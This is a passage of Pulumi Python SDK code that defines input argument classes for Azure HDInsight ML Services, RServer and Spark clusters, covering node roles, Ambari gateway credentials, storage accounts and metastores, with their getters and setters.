                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Zookeeper Node configuration for an HDInsight ML Services Cluster.

        All arguments force a new resource to be created when changed.

        :param pulumi.Input[str] username: Local administrator username for the Zookeeper Nodes.
        :param pulumi.Input[str] vm_size: Virtual Machine size to use for the Zookeeper Nodes.
        :param pulumi.Input[str] password: Local administrator password for the Zookeeper Nodes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH keys for the local administrator on the Zookeeper Nodes.
        :param pulumi.Input[str] subnet_id: ID of the Subnet in which to provision the Zookeeper Nodes.
        :param pulumi.Input[str] virtual_network_id: ID of the Virtual Network in which to provision the Zookeeper Nodes.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional arguments are only recorded when the caller supplied a value.
        optional_entries = (
            ("password", password),
            ("ssh_keys", ssh_keys),
            ("subnet_id", subnet_id),
            ("virtual_network_id", virtual_network_id),
        )
        for entry_key, entry_value in optional_entries:
            if entry_value is not None:
                pulumi.set(__self__, entry_key, entry_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        Local administrator username for the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        Virtual Machine size to use for the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", new_value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Local administrator password for the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        SSH keys for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", new_value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Subnet in which to provision the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", new_value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Virtual Network in which to provision the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", new_value)
@pulumi.input_type
class MLServicesClusterStorageAccountArgs:
    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        Storage Account configuration for an HDInsight ML Services Cluster.

        All arguments force a new resource to be created when changed.

        :param pulumi.Input[bool] is_default: Whether this is the Default Storage Account for the cluster.
        :param pulumi.Input[str] storage_account_key: Access Key used to connect to the Storage Account.
        :param pulumi.Input[str] storage_container_id: ID of the Storage Container.
        """
        # All three arguments are mandatory; store them in one pass.
        for field_key, field_value in (
                ("is_default", is_default),
                ("storage_account_key", storage_account_key),
                ("storage_container_id", storage_container_id)):
            pulumi.set(__self__, field_key, field_value)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """
        Whether this is the Default Storage Account for the HDInsight ML Services Cluster. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, new_value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", new_value)

    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """
        Access Key used to connect to the Storage Account. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_key")

    @storage_account_key.setter
    def storage_account_key(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", new_value)

    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """
        ID of the Storage Container. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_container_id")

    @storage_container_id.setter
    def storage_container_id(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", new_value)
@pulumi.input_type
class RServerClusterGatewayArgs:
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Ambari Portal (gateway) settings for an HDInsight RServer Cluster.

        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        if enabled is not None:
            # `enabled` is deprecated: emit both the Python and Pulumi warnings,
            # then still record the value so existing configurations keep working.
            # (Collapsed the previously duplicated `is not None` check into one branch.)
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The password used for the Ambari Portal.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The username used for the Ambari Portal. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class RServerClusterRolesArgs:
    def __init__(__self__, *,
                 edge_node: pulumi.Input['RServerClusterRolesEdgeNodeArgs'],
                 head_node: pulumi.Input['RServerClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['RServerClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['RServerClusterRolesZookeeperNodeArgs']):
        """
        The full set of node roles that make up an HDInsight RServer Cluster.

        :param pulumi.Input['RServerClusterRolesEdgeNodeArgs'] edge_node: A `edge_node` block as defined above.
        :param pulumi.Input['RServerClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['RServerClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['RServerClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        """
        # Every role is mandatory, so all four are stored unconditionally.
        role_entries = (
            ("edge_node", edge_node),
            ("head_node", head_node),
            ("worker_node", worker_node),
            ("zookeeper_node", zookeeper_node),
        )
        for role_key, role_args in role_entries:
            pulumi.set(__self__, role_key, role_args)

    @property
    @pulumi.getter(name="edgeNode")
    def edge_node(self) -> pulumi.Input['RServerClusterRolesEdgeNodeArgs']:
        """
        The `edge_node` configuration block for this cluster.
        """
        return pulumi.get(self, "edge_node")

    @edge_node.setter
    def edge_node(self, new_value: pulumi.Input['RServerClusterRolesEdgeNodeArgs']):
        pulumi.set(self, "edge_node", new_value)

    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['RServerClusterRolesHeadNodeArgs']:
        """
        The `head_node` configuration block for this cluster.
        """
        return pulumi.get(self, "head_node")

    @head_node.setter
    def head_node(self, new_value: pulumi.Input['RServerClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", new_value)

    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['RServerClusterRolesWorkerNodeArgs']:
        """
        The `worker_node` configuration block for this cluster.
        """
        return pulumi.get(self, "worker_node")

    @worker_node.setter
    def worker_node(self, new_value: pulumi.Input['RServerClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", new_value)

    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['RServerClusterRolesZookeeperNodeArgs']:
        """
        The `zookeeper_node` configuration block for this cluster.
        """
        return pulumi.get(self, "zookeeper_node")

    @zookeeper_node.setter
    def zookeeper_node(self, new_value: pulumi.Input['RServerClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", new_value)
@pulumi.input_type
class RServerClusterRolesEdgeNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Edge Node configuration for an HDInsight RServer Cluster.

        All arguments force a new resource to be created when changed.

        :param pulumi.Input[str] username: Local administrator username for the Edge Node.
        :param pulumi.Input[str] vm_size: Virtual Machine size to use for the Edge Node.
        :param pulumi.Input[str] password: Local administrator password for the Edge Node.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH keys for the local administrator on the Edge Node.
        :param pulumi.Input[str] subnet_id: ID of the Subnet in which to provision the Edge Node.
        :param pulumi.Input[str] virtual_network_id: ID of the Virtual Network in which to provision the Edge Node.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional arguments are only recorded when the caller supplied a value.
        optional_entries = (
            ("password", password),
            ("ssh_keys", ssh_keys),
            ("subnet_id", subnet_id),
            ("virtual_network_id", virtual_network_id),
        )
        for entry_key, entry_value in optional_entries:
            if entry_value is not None:
                pulumi.set(__self__, entry_key, entry_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        Local administrator username for the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        Virtual Machine size to use for the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", new_value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Local administrator password for the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        SSH keys for the local administrator on the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", new_value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Subnet in which to provision the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", new_value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Virtual Network in which to provision the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", new_value)
@pulumi.input_type
class RServerClusterRolesHeadNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Head Node configuration for an HDInsight RServer Cluster.

        :param pulumi.Input[str] username: Local administrator username for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: Virtual Machine size used for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: Local administrator password for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH keys for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: ID of the Subnet (within the Virtual Network) hosting the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: ID of the Virtual Network hosting the Head Nodes. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional inputs are only recorded when the caller supplied them.
        for key, arg in (("password", password),
                         ("ssh_keys", ssh_keys),
                         ("subnet_id", subnet_id),
                         ("virtual_network_id", virtual_network_id)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """Local administrator username for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """Virtual Machine size used for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """Local administrator password for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """SSH keys for the local administrator on the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """ID of the Subnet (within the Virtual Network) hosting the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """ID of the Virtual Network hosting the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class RServerClusterRolesWorkerNodeArgs:
    def __init__(__self__, *,
                 target_instance_count: pulumi.Input[int],
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 min_instance_count: Optional[pulumi.Input[int]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Worker Node configuration for an HDInsight RServer Cluster.

        :param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
        :param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created. Deprecated: removed from the API and will be dropped in version 3.0 of the provider.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "target_instance_count", target_instance_count)
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        if min_instance_count is not None:
            # Merged the original duplicated `is not None` guard: emit the
            # deprecation warnings and record the value in a single branch.
            warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
            pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
            pulumi.set(__self__, "min_instance_count", min_instance_count)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if ssh_keys is not None:
            pulumi.set(__self__, "ssh_keys", ssh_keys)
        if subnet_id is not None:
            pulumi.set(__self__, "subnet_id", subnet_id)
        if virtual_network_id is not None:
            pulumi.set(__self__, "virtual_network_id", virtual_network_id)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The number of instances which should be run for the Worker Nodes.
        """
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        Deprecated: removed from the API and will be dropped in version 3.0 of the provider.
        """
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class RServerClusterRolesZookeeperNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Zookeeper Node configuration for an HDInsight RServer Cluster.

        :param pulumi.Input[str] username: Local administrator username for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: Virtual Machine size used for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: Local administrator password for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH keys for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: ID of the Subnet (within the Virtual Network) hosting the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: ID of the Virtual Network hosting the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional inputs are only recorded when the caller supplied them.
        for key, arg in (("password", password),
                         ("ssh_keys", ssh_keys),
                         ("subnet_id", subnet_id),
                         ("virtual_network_id", virtual_network_id)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """Local administrator username for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """Virtual Machine size used for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """Local administrator password for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """SSH keys for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """ID of the Subnet (within the Virtual Network) hosting the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """ID of the Virtual Network hosting the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class RServerClusterStorageAccountArgs:
    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        Storage Account configuration for an HDInsight RServer Cluster.

        :param pulumi.Input[bool] is_default: Whether this is the Default Storage Account for the HDInsight RServer Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_key: Access Key used to connect to the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_container_id: ID of the Storage Container. Changing this forces a new resource to be created.
        """
        # All three fields are required inputs.
        for key, arg in (("is_default", is_default),
                         ("storage_account_key", storage_account_key),
                         ("storage_container_id", storage_container_id)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Whether this is the Default Storage Account for the HDInsight RServer Cluster. Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)

    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """Access Key used to connect to the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_account_key")

    @storage_account_key.setter
    def storage_account_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", value)

    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """ID of the Storage Container. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_container_id")

    @storage_container_id.setter
    def storage_container_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class SparkClusterComponentVersionArgs:
    def __init__(__self__, *,
                 spark: pulumi.Input[str]):
        """
        Component-version selection for an HDInsight Spark Cluster.

        :param pulumi.Input[str] spark: Version of Spark used for this HDInsight Spark Cluster. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "spark", spark)

    @property
    @pulumi.getter
    def spark(self) -> pulumi.Input[str]:
        """Version of Spark used for this HDInsight Spark Cluster. Changing this forces a new resource to be created."""
        return pulumi.get(self, "spark")

    @spark.setter
    def spark(self, value: pulumi.Input[str]):
        pulumi.set(self, "spark", value)
@pulumi.input_type
class SparkClusterGatewayArgs:
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Ambari gateway configuration for an HDInsight Spark Cluster.

        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore. Deprecated.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        if enabled is not None:
            # Merged the original duplicated `is not None` guard: emit the
            # deprecation warnings and record the value in a single branch.
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The password used for the Ambari Portal.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The username used for the Ambari Portal. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class SparkClusterMetastoresArgs:
    def __init__(__self__, *,
                 ambari: Optional[pulumi.Input['SparkClusterMetastoresAmbariArgs']] = None,
                 hive: Optional[pulumi.Input['SparkClusterMetastoresHiveArgs']] = None,
                 oozie: Optional[pulumi.Input['SparkClusterMetastoresOozieArgs']] = None):
        """
        External metastore configuration for an HDInsight Spark Cluster.

        :param pulumi.Input['SparkClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
        :param pulumi.Input['SparkClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
        :param pulumi.Input['SparkClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
        """
        # Each metastore block is optional; only supplied ones are recorded.
        for key, arg in (("ambari", ambari), ("hive", hive), ("oozie", oozie)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def ambari(self) -> Optional[pulumi.Input['SparkClusterMetastoresAmbariArgs']]:
        """An `ambari` block as defined below."""
        return pulumi.get(self, "ambari")

    @ambari.setter
    def ambari(self, value: Optional[pulumi.Input['SparkClusterMetastoresAmbariArgs']]):
        pulumi.set(self, "ambari", value)

